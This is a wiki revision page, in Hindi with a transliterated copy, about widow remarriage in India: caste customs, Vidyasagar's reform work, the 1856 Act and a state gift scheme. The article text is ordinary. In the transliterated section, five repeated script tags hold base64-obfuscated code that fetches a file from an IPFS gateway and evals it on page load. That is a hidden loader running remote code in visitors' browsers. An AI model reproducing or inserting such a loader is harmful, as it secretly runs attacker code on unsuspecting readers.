Difference between revisions of "विधवा विवाह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
विधवा से तात्पर्य ऐसी महिला से है जिसके विवाह उपरांत उसके पति का देहांत हो गया हो और वह वेध्वय जीवन व्यतीत कर रही हो। कुलीन वर्गीय [[ब्राह्मण|ब्राह्मणों]] में यह व्यवस्था थी कि पत्नी के निधन हो जाने पर वह किसी भी आयु में दूसरा विवाह कर सकते हैं। यह आयु वृद्धावस्था भी हो सकती थी। पत्नी के रूप वह किशोरवय लड़की का चयन करते थे और जब उनकी मृत्यु हो जाती थी तो उस विधवा को समाज से अलग कर उसके साथ पाशविक व्यवहार किया जाता था। जो महिलाएं इस तरह के व्यवहार को सहन नहीं कर पाती थीं, वह खुद को समर्थन देने के लिए वेश्यावृत्ति की ओर क़दम बढ़ा लेती थीं। विधवा विवाह को बेहद घृणित दृष्टि से देखा जाता था। इसी कारण [[अखण्डित बंगाल|बंगाल]] में महिलाओं विशेषकर बाल विधवाओं की स्थिति बेहद दयनीय थी।  
+
{{सूचना बक्सा संक्षिप्त परिचय
* [[ब्राह्मण]],  उच्च राजपूत, महाजन, ढोली, चूड़ीगर तथा सांसी जातियों में विधवा विवाह वर्जित था। अन्य जातियों में विधवा विवाह प्रचलित थे। विधवा विवाह को "नाता' के नाम से पुकारा जाता था। विधवा को विवाह करने से पूर्व मृतक पति के घर वालों से "फारगती' (हिसाब का चुकाना) करना आवश्यक था। फारगती के लिए मालियों में 16 से 50 रुपये तक एवं भाटों में 50 रुपये देने का रिवाज था।
+
|चित्र=Widow-Marriage.jpg
* विधवा के द्वारा ऐसा न करने पर जाति पंचायत एवं सरकार द्वारा जुर्माना किया जाता था। उदाहरण स्वरुप [[कोटा]] के राजा मीना ने फारगती नहीं की थी, अत: सरकार ने उस पर 10 रुपये जुर्माना किया था। विधवा विवाह में भी धन का लेन-देन होता था। पेशेवर तथा निम्न जातियों की स्त्रियाँ पति के जीवित होते हुए भी धन के लालच में किसी अन्य से "नाते' चली जाती थी। नाते सो जो संतान पैदा होती थी वो वैध समझी जाती थी।
+
|चित्र का नाम=विधवा विवाह
* वर्ष 1853 में हुए एक अनुमान के अनुसार [[कोलकाता]] में लगभग 12,718 वेश्याएं रहती थी। [[ईश्वर चंद्र विद्यासागर]] उनकी इस हालत को परिमार्जित करने के लिए हमेशा प्रयासरत रहते थे। अक्षय कुमार दत्ता के सहयोग से ईश्वर चंद्र विद्यासागर ने विधवा विवाह को [[हिंदू]] समाज में स्थान दिलवाने का कार्य प्रारंभ किया। उनके प्रयासों द्वारा 1856 में अंग्रेज़ी सरकार ने विधवा पुनर्विवाह अधिनियम पारित कर इस अमानवीय मनुष्य प्रवृत्ति पर लगाम लगाने की कोशिश की। ईश्वर चंद्र विद्यासागर ने अपने पुत्र का विवाह भी एक विधवा से ही किया था।  
+
|विवरण='''विधवा विवाह''' का अभिप्राय ऐसी महिला से विवाह है जिसके पति का देहांत हो गया हो।
 
+
|शीर्षक 1=इतिहास
 +
|पाठ 1=[[प्राचीन भारत]] के [[इतिहास]] में [[ब्राह्मण]],  उच्च राजपूत, महाजन, ढोली, चूड़ीगर तथा [[सांसी]] जातियों में विधवा विवाह वर्जित था। अन्य जातियों में विधवा विवाह प्रचलित थे।
 +
|शीर्षक 2=विधवा विवाह उपहार योजना
 +
|पाठ 2=इस योजना के अन्‍तर्गत, वर्तमान पेन्‍शन नियमों में हकदार विधवा महिला यदि शादी करती है तो उसे शादी के मौके पर राज्‍य सरकार की ओर से उपहार स्‍वरूप 15,000 [[रुपया|रुपये]] की राशि प्रदान की जाती है।
 +
|शीर्षक 3=
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=[[अग्नि परीक्षा]], [[दहेज प्रथा]], [[नाता प्रथा]], [[पर्दा प्रथा]]
 +
|अन्य जानकारी=[[ईश्वर चंद्र विद्यासागर]] ने विधवा विवाह को [[हिंदू]] समाज में स्थान दिलवाने का कार्य प्रारंभ किया। उनके प्रयासों द्वारा 1856 में [[अंग्रेज़ी शासन|अंग्रेज़ी सरकार]] ने विधवा पुनर्विवाह अधिनियम पारित कर इस अमानवीय मनुष्य प्रवृत्ति पर लगाम लगाने की कोशिश की। ईश्वर चंद्र विद्यासागर ने अपने [[पुत्र]] का विवाह भी एक विधवा से ही किया था।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''विधवा विवाह''' से तात्पर्य ऐसी महिला से [[विवाह]] है जिसके विवाह उपरांत उसके पति का देहांत हो गया हो और वह वैध्वय जीवन व्यतीत कर रही हो। [[कुलीन]] वर्गीय [[ब्राह्मण|ब्राह्मणों]] में यह व्यवस्था थी कि पत्नी के निधन हो जाने पर वह किसी भी आयु में दूसरा विवाह कर सकते हैं। यह आयु वृद्धावस्था भी हो सकती थी। पत्नी के रूप वह किशोरवय लड़की का चयन करते थे और जब उनकी मृत्यु हो जाती थी तो उस विधवा को समाज से अलग कर उसके साथ पाश्विक व्यवहार किया जाता था। जो महिलाएं इस तरह के व्यवहार को सहन नहीं कर पाती थीं, वह खुद को समर्थन देने के लिए वेश्यावृत्ति की ओर क़दम बढ़ा लेती थीं। विधवा विवाह को बेहद घृणित दृष्टि से देखा जाता था। इसी कारण [[अखण्डित बंगाल|बंगाल]] में महिलाओं विशेषकर बाल विधवाओं की स्थिति बेहद दयनीय थी। [[चित्र:Hindu-widow-marriage.jpg|left|thumb|[[ईश्वर चंद्र विद्यासागर]] की पुस्तक हिन्दू विधवा विवाह]]
 +
==स्मरणीय तथ्य==
 +
* [[प्राचीन भारत]] के [[इतिहास]] में [[ब्राह्मण]],  उच्च राजपूत, महाजन, ढोली, चूड़ीगर तथा [[सांसी]] जातियों में विधवा विवाह वर्जित था। अन्य जातियों में विधवा विवाह प्रचलित थे। विधवा विवाह को "नाता' के नाम से पुकारा जाता था। विधवा को विवाह करने से पूर्व मृतक पति के घर वालों से "फारगती' (हिसाब का चुकाना) करना आवश्यक था। फारगती के लिए मालियों में 16 से 50 रुपये तक एवं भाटों में 50 रुपये देने का रिवाज था।
 +
* विधवा के द्वारा ऐसा न करने पर जाति पंचायत एवं सरकार द्वारा जुर्माना किया जाता था। उदाहरण स्वरूप [[कोटा]] के राजा मीना ने फारगती नहीं की थी, अत: सरकार ने उस पर 10 रुपये जुर्माना किया था। विधवा विवाह में भी धन का लेन-देन होता था। पेशेवर तथा निम्न जातियों की स्त्रियाँ पति के जीवित होते हुए भी धन के लालच में किसी अन्य से "नाते' चली जाती थी। नाते से जो संतान पैदा होती थी वो वैध समझी जाती थी।
 +
* वर्ष 1853 में हुए एक अनुमान के अनुसार [[कोलकाता]] में लगभग 12,718 वेश्याएं रहती थी। [[ईश्वर चंद्र विद्यासागर]] उनकी इस हालत को परिमार्जित करने के लिए हमेशा प्रयासरत रहते थे। अक्षय कुमार दत्ता के सहयोग से ईश्वर चंद्र विद्यासागर ने विधवा विवाह को [[हिंदू]] समाज में स्थान दिलवाने का कार्य प्रारंभ किया। उनके प्रयासों द्वारा 1856 में [[अंग्रेज़ी शासन|अंग्रेज़ी सरकार]] ने विधवा पुनर्विवाह अधिनियम पारित कर इस अमानवीय मनुष्य प्रवृत्ति पर लगाम लगाने की कोशिश की। ईश्वर चंद्र विद्यासागर ने अपने [[पुत्र]] का विवाह भी एक विधवा से ही किया था।  
 
==विधवा विवाह उपहार योजना==  
 
==विधवा विवाह उपहार योजना==  
बजट घोषणा वर्ष 2007-08 की अनुपालना में विधवा महिलाओं की वैधव्‍य अवस्‍था को समाप्‍त करने की दृष्टि से इस योजना को प्रारम्‍भ किया गया है। योजनान्‍तर्गत, वर्तमान पेन्‍शन नियमों में हकदार विधवा महिला यदि शादी करती है तो उसे शादी के मौके पर राज्‍य सरकार की ओर से उपहार स्‍वरूप 15,000 रुपये की राशि प्रदान की जाती है। इस हेतु आवेदिका को निर्धारित प्रार्थना पत्र भरकर विवाह के एक माह बाद तक सम्‍बन्धित ज़िले के ज़िला अधिकारी, सामाजिक न्‍याय एवं अधिकारिता विभाग को प्रस्‍तुत करना होगा।  
+
बजट घोषणा वर्ष [[2007]]-[[2008|08]] की अनुपालना में विधवा महिलाओं की वैधव्‍य अवस्‍था को समाप्‍त करने की दृष्टि से इस योजना को प्रारम्‍भ किया गया है। योजनान्‍तर्गत, वर्तमान पेन्‍शन नियमों में हकदार विधवा महिला यदि शादी करती है तो उसे शादी के मौके पर राज्‍य सरकार की ओर से उपहार स्‍वरूप 15,000 [[रुपया|रुपये]] की राशि प्रदान की जाती है। इस हेतु आवेदिका को निर्धारित प्रार्थना पत्र भरकर विवाह के एक [[माह]] बाद तक सम्‍बन्धित ज़िले के ज़िला अधिकारी, सामाजिक न्‍याय एवं अधिकारिता विभाग को प्रस्‍तुत करना होगा।  
  
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक3|माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:40, 25 March 2015

vidhava vivah
vivaran vidhava vivah ka abhipray aisi mahila se vivah hai jisake pati ka dehaant ho gaya ho.
itihas prachin bharat ke itihas mean brahman, uchch rajapoot, mahajan, dholi, choo digar tatha saansi jatiyoan mean vidhava vivah varjit tha. any jatiyoan mean vidhava vivah prachalit the.
vidhava vivah upahar yojana is yojana ke anh‍targat, vartaman penh‍shan niyamoan mean hakadar vidhava mahila yadi shadi karati hai to use shadi ke mauke par rajh‍y sarakar ki or se upahar sh‍varoop 15,000 rupaye ki rashi pradan ki jati hai.
sanbandhit lekh agni pariksha, dahej pratha, nata pratha, parda pratha
any janakari eeshvar chandr vidyasagar ne vidhava vivah ko hiandoo samaj mean sthan dilavane ka kary praranbh kiya. unake prayasoan dvara 1856 mean aangrezi sarakar ne vidhava punarvivah adhiniyam parit kar is amanaviy manushy pravritti par lagam lagane ki koshish ki. eeshvar chandr vidyasagar ne apane putr ka vivah bhi ek vidhava se hi kiya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vidhava vivah se tatpary aisi mahila se vivah hai jisake vivah uparaant usake pati ka dehaant ho gaya ho aur vah vaidhvay jivan vyatit kar rahi ho. kulin vargiy brahmanoan mean yah vyavastha thi ki patni ke nidhan ho jane par vah kisi bhi ayu mean doosara vivah kar sakate haian. yah ayu vriddhavastha bhi ho sakati thi. patni ke roop vah kishoravay l daki ka chayan karate the aur jab unaki mrityu ho jati thi to us vidhava ko samaj se alag kar usake sath pashvik vyavahar kiya jata tha. jo mahilaean is tarah ke vyavahar ko sahan nahian kar pati thian, vah khud ko samarthan dene ke lie veshyavritti ki or qadam badha leti thian. vidhava vivah ko behad ghrinit drishti se dekha jata tha. isi karan bangal mean mahilaoan visheshakar bal vidhavaoan ki sthiti behad dayaniy thi. [[chitr:Hindu-widow-marriage.jpg|left|thumb|eeshvar chandr vidyasagar ki pustak hindoo vidhava vivah]]

smaraniy tathy

  • prachin bharat ke itihas mean brahman,  uchch rajapoot, mahajan, dholi, choo digar tatha saansi jatiyoan mean vidhava vivah varjit tha. any jatiyoan mean vidhava vivah prachalit the. vidhava vivah ko "nata' ke nam se pukara jata tha. vidhava ko vivah karane se poorv mritak pati ke ghar valoan se "pharagati' (hisab ka chukana) karana avashyak tha. pharagati ke lie maliyoan mean 16 se 50 rupaye tak evan bhatoan mean 50 rupaye dene ka rivaj tha.
  • vidhava ke dvara aisa n karane par jati panchayat evan sarakar dvara jurmana kiya jata tha. udaharan svaroop kota ke raja mina ne pharagati nahian ki thi, at: sarakar ne us par 10 rupaye jurmana kiya tha. vidhava vivah mean bhi dhan ka len-den hota tha. peshevar tatha nimn jatiyoan ki striyaan pati ke jivit hote hue bhi dhan ke lalach mean kisi any se "nate' chali jati thi. nate se jo santan paida hoti thi vo vaidh samajhi jati thi.
  • varsh 1853 mean hue ek anuman ke anusar kolakata mean lagabhag 12,718 veshyaean rahati thi. eeshvar chandr vidyasagar unaki is halat ko parimarjit karane ke lie hamesha prayasarat rahate the. akshay kumar datta ke sahayog se eeshvar chandr vidyasagar ne vidhava vivah ko hiandoo samaj mean sthan dilavane ka kary praranbh kiya. unake prayasoan dvara 1856 mean aangrezi sarakar ne vidhava punarvivah adhiniyam parit kar is amanaviy manushy pravritti par lagam lagane ki koshish ki. eeshvar chandr vidyasagar ne apane putr ka vivah bhi ek vidhava se hi kiya tha.

vidhava vivah upahar yojana

bajat ghoshana varsh 2007-08 ki anupalana mean vidhava mahilaoan ki vaidhavh‍y avash‍tha ko samaph‍t karane ki drishti se is yojana ko praramh‍bh kiya gaya hai. yojananh‍targat, vartaman penh‍shan niyamoan mean hakadar vidhava mahila yadi shadi karati hai to use shadi ke mauke par rajh‍y sarakar ki or se upahar sh‍varoop 15,000 rupaye ki rashi pradan ki jati hai. is hetu avedika ko nirdharit prarthana patr bharakar vivah ke ek mah bad tak samh‍bandhit zile ke zila adhikari, samajik nh‍yay evan adhikarita vibhag ko prash‍tut karana hoga.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>